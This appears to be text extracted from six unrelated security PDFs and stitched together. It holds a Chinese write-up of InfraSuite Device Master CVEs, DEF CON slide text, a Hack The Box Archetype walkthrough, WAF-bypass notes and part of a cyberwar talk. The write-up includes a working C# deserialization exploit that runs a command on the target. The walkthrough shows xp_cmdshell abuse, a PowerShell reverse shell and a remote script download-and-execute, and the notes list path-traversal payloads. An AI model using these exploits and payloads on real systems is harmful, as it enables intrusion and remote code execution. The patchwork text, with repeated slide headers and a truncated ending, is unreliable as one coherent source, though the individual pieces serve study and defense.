对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 1 / 15 author: Y4er 前⾔ 看到zdi发了⼀堆洞,有反序列化、⽬录穿越、权限绕过等等,还是dotnet的,于是有了此⽂。 基础架构 exe对应端⼝ C:\Program Files\InfraSuite Device Master\Device-DataCollect\Device-DataCollect.exe 3000 C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe 3100 3110 C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe 80 443 CVE-2022-41778 https://www.zerodayinitiative.com/advisories/ZDI-22-1478/ 这个漏洞在3100和3110端⼝ 从TCP服务器到业务处理的逻辑如下 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 2 / 15 StartGatewayOperation中设置了⽹关服务的⼀些配置 初始化TCP端⼝ 监听IPv4 v6,端⼝DEFAULT_TCP_PORT 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 3 / 15 this.InitialWebEngine()中配置了web服务器 在StartControlLayer中起worker线程跑业务逻辑 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 4 / 15 也就是MainLoop 在DoUpperLayerNWPacket中根据PacketData的sHeader字段的i32PayloadType进⾏switch case。 随便进⼊⼀个case 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 5 / 15 看到 Serialization.DeSerializeBinary(sPacket.payload, out obj) 直接binaryformatter,没啥好说的。关键点在于怎么构造payload。 构造payload 构造需要研究其tcp的处理逻辑,在ControlLayerMngt的构造函数中 初始化了⼀个TCPServerConnectionMngt,在ModuleInitialization中定义了TCP链接的send和receive事件。 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 6 / 15 我们发送给server的请求是receive事件,被ReceiveCallBack处理。 分别进⾏add、check操作 在add中将传⼊的buffer赋予⾃身this._gRxPacketBytesBuffer,变⻓存储字节数据。 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 7 / 15 check中检查数据包格式,重组PacketData对象 并调⽤this.AddRxPacket(packetData)将重组的packet对象加⼊this._gRxPacketList 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 8 / 15 回看MainLoop this.CheckUpperLayerNWPacket(); this.DoUpperLayerNWPacket(); Check调⽤ReceivePacket判断this._gRxPacketList中是否有数据包 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 9 / 15 ReceivePacket调⽤GetFirstRxPacket拿到第⼀个数据包packet 然后调⽤this._gUpperLayerNWPacketQueue.AddToSyncQueue(packetData)将数据包加⼊到同步队列中。 DoUpperLayerNWPacket就是拿到队列中的第⼀个数据包 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 10 / 15 到这⾥的话就随便进⼊⼀个case,拿CtrlLayerNWCmd_FileOperation举例 将PacketData的payload字段反序列化回来,转为CtrlLayerNWCommand_FileOperation业务对象从⽽进⾏下 ⼀步业务处理。 那么到此,我们基本明⽩了其架构。 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 11 / 15 那么写EXP完全照搬就⾏了。 using InfraSuiteManager.Common; using System; using System.IO; using System.Runtime.Serialization; using Microsoft.VisualStudio.Text.Formatting; using System.Net.Sockets; namespace ConsoleApp1 { internal class Program { [Serializable] public class TextFormattingRunPropertiesMarshal : ISerializable { protected TextFormattingRunPropertiesMarshal(SerializationInfo info, StreamingContext context) { } string _xaml; public void GetObjectData(SerializationInfo info, StreamingContext context) { Type typeTFRP = typeof(TextFormattingRunProperties); info.SetType(typeTFRP); info.AddValue("ForegroundBrush", _xaml); } public TextFormattingRunPropertiesMarshal(string xaml) { _xaml = xaml; } } static void Main(string[] args) { string xaml_payload = File.ReadAllText(@"1.txt"); 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 12 / 15 TextFormattingRunPropertiesMarshal payload = new TextFormattingRunPropertiesMarshal(xaml_payload); PacketData packet = new PacketData(); PacketOperation packetOperation = new PacketOperation(); if (!Serialization.SerializeBinary(payload, out packet.payload)) { Console.WriteLine("serialize error."); } packet.sHeader.i32PayloadSize = packet.payload.Length; byte[] byTxPacket; packetOperation.MakePacketBytes(packet, out byTxPacket); TcpClient tcpClient = new TcpClient("172.16.9.136", 3000); NetworkStream stream = tcpClient.GetStream(); var b = new BinaryWriter(stream); b.Write(byTxPacket); stream.Close(); tcpClient.Close(); Console.WriteLine("done."); Console.ReadKey(); } } } <?xml version="1.0" encoding="utf-16"?> <ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"> <ObjectDataProvider.ObjectInstance> <sd:Process> <sd:Process.StartInfo> <sd:ProcessStartInfo Arguments="/c notepad" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" /> </sd:Process.StartInfo> </sd:Process> </ObjectDataProvider.ObjectInstance> </ObjectDataProvider> 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 13 / 15 对于Device-DataCollect 根据packetData.sHeader.i32PayloadType可以case到1 InfraSuiteManager.DataCollectionLayer.DataCollectionLayerMngt.DCLNWCmd_DCServerS tatus(ref PacketData) 这个地⽅有反序列化 构造payload不写了,Device-DataCollect和Device-Gateway架构差不多。同样⽤PacketOperation构造 packet数据包就⾏了。 其他的洞就是case不⼀样,以下就只写漏洞点所在了。 CVE-2022-41657 InfraSuiteManager.ControlLayer.ControlLayerMngt.CtrlLayerNWCmd_FileOperation(ref PacketData) 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 14 / 15 fileName参数可控导致跨⽬录任意⽂件写⼊+任意⽂件删除 fileName参数导致任意⽂件读取 CVE-2022-41772 没看出来,感觉是解压⽬录穿越 对ZDI公布的InfraSuite Device Master⼀揽⼦漏洞的分析.md 2022/11/8 15 / 15 CVE-2022-41688 CVE-2022-40202 总结 很经典的dotnet tcp server的漏洞,尤其是server对于tcp packet的处理和业务逻辑的关联梳理,让我对 dotnet的理解更进⼀步。
pdf
8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& https:// github.com/ RedBalloonShena nigans/ MonitorDarkly A Monitor Darkly Ang Cui, PhD | Jatin Kataria 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& DDC& http://caxapa.ru/thumbs/349020/ddcciv1.pdf 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& Answered&Ques@on&1&&&2& 8/5/16& DEFCON24&A&Monitor&Darkly&& Answered&Ques@on&1&&&2& 8/5/16& DEFCON24&A&Monitor&Darkly&& Transfers&the&image& 8/5/16& DEFCON24&A&Monitor&Darkly&& Transfers&the&image& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& Box&with&& & Color&0& Color&1& Color&2& Color&3& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& Doc&men@ons&8-bit&CLU 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& Samsung&SE310& Dell&2417U& HP&23xw& Acer&G246HL& 8/5/16& DEFCON24&A&Monitor&Darkly&& SE1279RL-MST& MST9122H1& TSUMOL88CDC5-1& TSUML58YHC2-1& 8/5/16& DEFCON24&A&Monitor&Darkly&& SE1279RL-MST& MST9122H1& TSUMOL88CDC5-1& TSUML58YHC2-1& 8/5/16& DEFCON24&A&Monitor&Darkly&& SE1279RL-MST& MST9122H1& TSUMOL88CDC5-1& TSUML58YHC2-1& 8/5/16& DEFCON24&A&Monitor&Darkly&& SE1279RL-MST& MST9122H1& TSUMOL88CDC5-1& TSUML58YHC2-1& 8/5/16& DEFCON24&A&Monitor&Darkly&& SE1279RL-MST& MST9122H1& TSUMOL88CDC5-1& TSUML58YHC2-1& 8/5/16& DEFCON24&A&Monitor&Darkly&& http://boeglin.org/blog/index.php? entry=Flashing-a-BenQ-Z-series-for- free(dom) Alexandre Boeglin 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& https://github.com/RedBalloonShenanigans/MonitorDarkly 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& 8/5/16& DEFCON24&A&Monitor&Darkly&& DELL Does not yet have A security fix against SHAK ATTACK 8/5/16& DEFCON24&A&Monitor&Darkly&& MANY MONITORS WERE HARMED IN THE MAKING OF THIS PRESENTATION 8/5/16& DEFCON24&A&Monitor&Darkly&& Chris lives happily with his Semi- unmodified 34” monitor
pdf
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports 10.10.10.27 //-sC //-sV ​ ​ hack the box——-Archetype 0x00 0x01 ​ <DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> </DTSConfigurationHeading> <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue </Configuration> </DTSConfiguration> Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial ​ select is_srvrolemember('sysadmin'); //is_srvrolemember EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1 reconfigure; xp_cmdshell "whoami" 0x02 mssql 0x03 $client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data python3 -m http.server 80 nc -lvnp 443 ufw allow from 10.10.10.27 proto tcp to any port 80,443 //80443 xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.163/shell.ps1\");" //ps type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ​ ​ cd \Users\Administrator\Desktop type root.txt 0x04
pdf
1 OLONLWNW-记次绕waf ⼀、前⾔ ⼆、第⼀次⻅这样的waf 三、⼲翻waf 做项⽬遇到,感觉有点意思记录⼀下。 打开这个站的时候就注意到了这个站⽤了之前我审过的⼀个框架具体是哪个就不说了。 本来想着直接打就⾏了结果有点意思。 java的框架存在两处权限绕过 第⼀处 第⼆处 我本着直接打完交洞的想法使⽤第⼆种权限绕过⽅式没想到看到了如下界⾯ ⼀、前⾔ ⼆、第⼀次⻅这样的waf Plain Text 复制代码 Plain Text 复制代码 /xxx/../api/user 1 /api/user;1.js 1 2 我⼲了啥就拦我了,第⼀次⻅拦我分号。之前阿⾥云waf也不这么拦我啊 /api/user;?upload=file 拦截 试试..呢 /xxx/../api/user 拦截 三、⼲翻waf 3 /xxx/..;/api/use 拦截 各种编码、参数污染、垃圾数据包都被拦了 4 看来不能从这些⽅⾯下⼿,还是回到分号和..上 /xxx/api/user; 拦截 /xxx/api/user?; 不拦 5 但是这样不能使⽤;1.js绕,因为getRequestURI()是获取不到问号后⾯的那把问号编码呢 /xxx/api/user%3f; 但是这样就匹配不到我原来的路由也没⽤。然后我⼜测试了 /xxx/%3f/../../api/user 被拦 此时想到再⽤..; 因为之前测阿⾥云waf的时候发现../拦截..;/不拦截 那么这个waf可能是拦截../和; 分号可以⽤问号编码绕过然后我再插⼊分号不就绕过了 /xxx/%3f/..;/..;/api/user 接下来就可以正常上传了 然后上传jsp⼜遇到waf了,⽤⼀个双引号和java unicode特性绕了 6
pdf
Covert Post-Exploitation Forensics with Metasploit Wesley McGrew McGrewSecurity.com Mississippi State University National Forensics Training Center From the DEF CON 19 CFP: Okay, let’s get sneaky... Covert • without the subject’s knowledge Post-Exploitation • after a remote compromise, local backdoor Forensics • reconstructing data above and beyond what the subject anticipates Forensics and penetration testing/ other offensive operations For the forensics geeks... ? No subject location, no problem Surreptitious acquisition and analysis Familiar tools... For the penetration testing geeks... Potential for more important data gathered per compromised system “We don’t keep that data” Multiple revisions of files, old data Data carving General purpose scripting Stealthy! Typical Forensics Examination Scenarios • Hardware seizure • Authorized software agents • On-site • “Suspect”/Subject is aware Covert Remote Forensics • Unaware Subject • No known physical location? • Not a deal-killer. • Remote imaging • Remote block device access Ears perking up yet? • Intelligence • Penetration testers upping post- exploitation game • Compliance • Criminal Forensics for people who break things Semester-long class Week-long LE Courses Talk to Pent este rs File System Forensic Capabilities • Allocated files • Deleted files • Slack space • Disk/Volume • Unallocated space • Deletion vs. Formatting vs. Wiping • Imaging Slack Space Example Sector size: 512 bytes Cluster size: 4 sectors File size: 4150 bytes RAM Slack (probably 0’d) Disk Slack (potential goodies) Can’t I do this already? • Load sleuth kit up onto the compromised target? • Probably will work but... • ...stomping on deleted files • ...not that stealthy • ...a little less slick than what I’m proposing: Enter Railgun • “Patrick HVE” - Are you out there? Massive thanks! If we can call Windows API remotely... • ...then we can access physical/logical block devices directly • ...which means we can read arbitrary sectors from the disk • ...why not map remote block devices to local ones? Metasploit Post Modules • enum_drives.rb • Helper/Support • imager.rb • byte-for-byte imaging • Hashing • Split images • Cool, but.......... nbd_server.rb! • Run forensic tools locally, on local block devices that are mapped to remote block devices! • API calls made over meterpreter shell • NBD (Network Block Device) • Easy way to get programmatic block devices in Linux • Read-only (forensic write-blocking) • Direct remote access with off-the-shelf/ commercial/open-source tools Attacker Target Meterpreter Win API Disk Metasploit nbd /dev/nbd0 Forensic Tools Stupid Protocol Tricks Disk Windows API Meterpreter/Railgun NBD iSCSI Caveats and exercises for the reader • Network • Speed • Stealth • Cleaner/cross-platform implementation • Pure ruby iSCSI? Conclusions • Go and wring more data out of systems! • Builds capability for forensic examiners and penetration testers • Encourage secure wiping Demos
pdf
Kim Jong Kim Jong--il and me: il and me: How to build a cyber army to attack the How to build a cyber army to attack the U.S. U.S. Charlie Miller Charlie Miller Independent Security Evaluators Independent Security Evaluators cmiller@securityevaluators.com cmiller@securityevaluators.com Overview Overview About me About me Some background material Some background material Key strategies Key strategies Cyberwar potential attacks Cyberwar potential attacks Cyberarmy tasks Cyberarmy tasks Possible defenses Possible defenses Layout of army Layout of army Timeline of preparation and attack Timeline of preparation and attack Conclusions and lessons learned Conclusions and lessons learned About this talk About this talk Originally given at Conference for Cyber Conflict, at Originally given at Conference for Cyber Conflict, at the NATO Cooperative Cyber Defense Centre of the NATO Cooperative Cyber Defense Centre of Excellence Excellence The audience was some technical, some policy types The audience was some technical, some policy types This version is a little more technical (and hopefully This version is a little more technical (and hopefully funny) funny) Who I am Who I am PhD in Mathematics, University of Notre Dame PhD in Mathematics, University of Notre Dame 1 year, Security Architect, a Financial Services firm 1 year, Security Architect, a Financial Services firm 5 years, NSA Global Network Exploitation Analyst 5 years, NSA Global Network Exploitation Analyst 4 years, consultant for Independent Security Evaluators 4 years, consultant for Independent Security Evaluators Application and network penetration testing Application and network penetration testing Project planning and scoping Project planning and scoping First remote exploits against iPhone, G1 Android phone First remote exploits against iPhone, G1 Android phone 3 time winner Pwn2Own competition 3 time winner Pwn2Own competition My career as a govie My career as a govie Bullets from my NSA approved resume Bullets from my NSA approved resume Computer Network Exploitation Computer Network Exploitation Performed computer network scanning and Performed computer network scanning and reconnaissance reconnaissance Executed numerous computer network exploitations Executed numerous computer network exploitations against foreign targets against foreign targets Network Intrusion Analysis Network Intrusion Analysis Designed and developed network intrusion detection tools Designed and developed network intrusion detection tools to find and stop exploitation of NIPRNET hosts, as well as to find and stop exploitation of NIPRNET hosts, as well as locate already compromised hosts locate already compromised hosts Why I gave this talk Why I gave this talk Those in charge of Those in charge of ““cyber cyber”” policy don policy don’’t understand t understand technical details technical details Sometimes the details matter Sometimes the details matter Clarke Clarke’’s s ““Cyberwar Cyberwar”” was clearly written by was clearly written by someone who knows nothing about the someone who knows nothing about the technological details technological details To help those capable of making decisions To help those capable of making decisions concerning cyberwar to discern fact from fiction concerning cyberwar to discern fact from fiction Basics Basics For comparison For comparison US Annual military spending: $708 Billion US Annual military spending: $708 Billion US Cyber Command: $105 Million US Cyber Command: $105 Million North Korea military spending: $5 Billion North Korea military spending: $5 Billion North Korean cyber warfare spending: $56 Million North Korean cyber warfare spending: $56 Million Iran cyber warfare spending: $76 Million Iran cyber warfare spending: $76 Million My hypothetical cyber army is a bargain at $49 My hypothetical cyber army is a bargain at $49 Million! Million! Aspects of Cyberwarfare Aspects of Cyberwarfare Collect intelligence Collect intelligence Control systems Control systems Deny or disable systems Deny or disable systems Cause harm on the level of Cause harm on the level of ““kinetic kinetic”” attacks attacks Some statistics Some statistics # IP addresses: ~3.7 bil # IP addresses: ~3.7 bil # personal computers: ~2 bil # personal computers: ~2 bil # iphones worldwide: ~41 mil # iphones worldwide: ~41 mil Botnets size: Botnets size: Zeus: 3.6 mil (.1% of personal computers) Zeus: 3.6 mil (.1% of personal computers) Koobface: 2.9 mil Koobface: 2.9 mil TidServ: 1.5 mil TidServ: 1.5 mil Conficker: 10 mil+ Conficker: 10 mil+ Botnet Botnet A distributed set of software programs which run A distributed set of software programs which run autonomously and automatically autonomously and automatically Group can be controlled to perform tasks Group can be controlled to perform tasks Individual software running on each system is called a Individual software running on each system is called a bot bot Remote access tool Remote access tool Abbreviated RAT Abbreviated RAT Program which allows remote control of a Program which allows remote control of a device/computer device/computer Allows attacker to search/monitor host, Allows attacker to search/monitor host, search/monitor local network, attack other hosts, etc search/monitor local network, attack other hosts, etc Should be hard to detect Should be hard to detect 00--day, the known unknowns day, the known unknowns A vulnerability or exploit that exists in software for A vulnerability or exploit that exists in software for which there is no available patch or fix which there is no available patch or fix Oftentimes, the existence of this exploit is unknown Oftentimes, the existence of this exploit is unknown by the community at large, even the vendor by the community at large, even the vendor Difficult to defend against the attack you don Difficult to defend against the attack you don’’t know t know about about 00--days exist days exist I found a bug in Samba in Aug 2005. Sold in Aug I found a bug in Samba in Aug 2005. Sold in Aug 2006, Fixed in May 2007 2006, Fixed in May 2007 Adobe JBIG2 vulnerability. Discovered in 2008, Sold Adobe JBIG2 vulnerability. Discovered in 2008, Sold in Jan 2009, Discussed in Feb 2009, Patch March in Jan 2009, Discussed in Feb 2009, Patch March 2009 2009 Found a bug preparing for Pwn2Own 2008. Used it in Found a bug preparing for Pwn2Own 2008. Used it in Pwn2Own 2009. Fixed 2 months later Pwn2Own 2009. Fixed 2 months later 00--day lifespan day lifespan Average lifespan of zero Average lifespan of zero--day bugs is 348 days day bugs is 348 days The shortest The shortest--lived bugs have been made public within lived bugs have been made public within 99 days 99 days The longest lifespan was 1080 days The longest lifespan was 1080 days nearly three years. nearly three years. From: Justine Aitel, CEO Immunity (from 2007) From: Justine Aitel, CEO Immunity (from 2007) 00--day detection day detection Possible but extremely difficult Possible but extremely difficult Tend to lead to false positives Tend to lead to false positives Can be circumvented if defenses are known Can be circumvented if defenses are known Overall Strategies Overall Strategies Dominate cyberspace Dominate cyberspace Infiltrate key systems in advance Infiltrate key systems in advance Rely on research and intelligence Rely on research and intelligence gathering gathering Use known exploits when possible, Use known exploits when possible, 00--days when necessary days when necessary Hack the Planet Hack the Planet ““Dominate cyberspace Dominate cyberspace””, i.e. control as many devices , i.e. control as many devices around the world as possible around the world as possible In a cyberwar, portions of the Internet will be degraded. In a cyberwar, portions of the Internet will be degraded. Controlling lots of devices increases ability to still act Controlling lots of devices increases ability to still act Makes attribution easier for your side, harder for Makes attribution easier for your side, harder for opponent opponent Sometimes you find yourself inside hard targets by luck Sometimes you find yourself inside hard targets by luck Many basic attacks work by using many hosts and are Many basic attacks work by using many hosts and are more effective with more hosts more effective with more hosts Advance Planning Advance Planning Attacking well secured networks requires research Attacking well secured networks requires research and planning, it cannot be done overnight and planning, it cannot be done overnight Many offensive capabilities (communication, Many offensive capabilities (communication, scanning, etc) are easily detected if performed scanning, etc) are easily detected if performed quickly, not if performed slowly quickly, not if performed slowly Can be prepared to disable/destroy key systems Can be prepared to disable/destroy key systems when needed when needed Research and Intelligence Research and Intelligence How are key financial and SCADA systems and How are key financial and SCADA systems and networks constructed? networks constructed? What hardware/software do core Internet routers, What hardware/software do core Internet routers, DNS servers utilize? DNS servers utilize? What defenses and monitoring systems are in place? What defenses and monitoring systems are in place? To 0 To 0--day or not day or not Sometimes, especially during early stages, it makes Sometimes, especially during early stages, it makes sense to look like an average attacker sense to look like an average attacker Use known vulnerabilities, known tools Use known vulnerabilities, known tools Harder to attribute to military Harder to attribute to military inexpensive if caught inexpensive if caught 00--day exploits and custom tools are harder to detect, day exploits and custom tools are harder to detect, but if found, are expensive and time consuming to but if found, are expensive and time consuming to replace replace Other strategies to consider Other strategies to consider Clarke Clarke’’s logic bombs s logic bombs Stealing from/paying cyber criminals for access Stealing 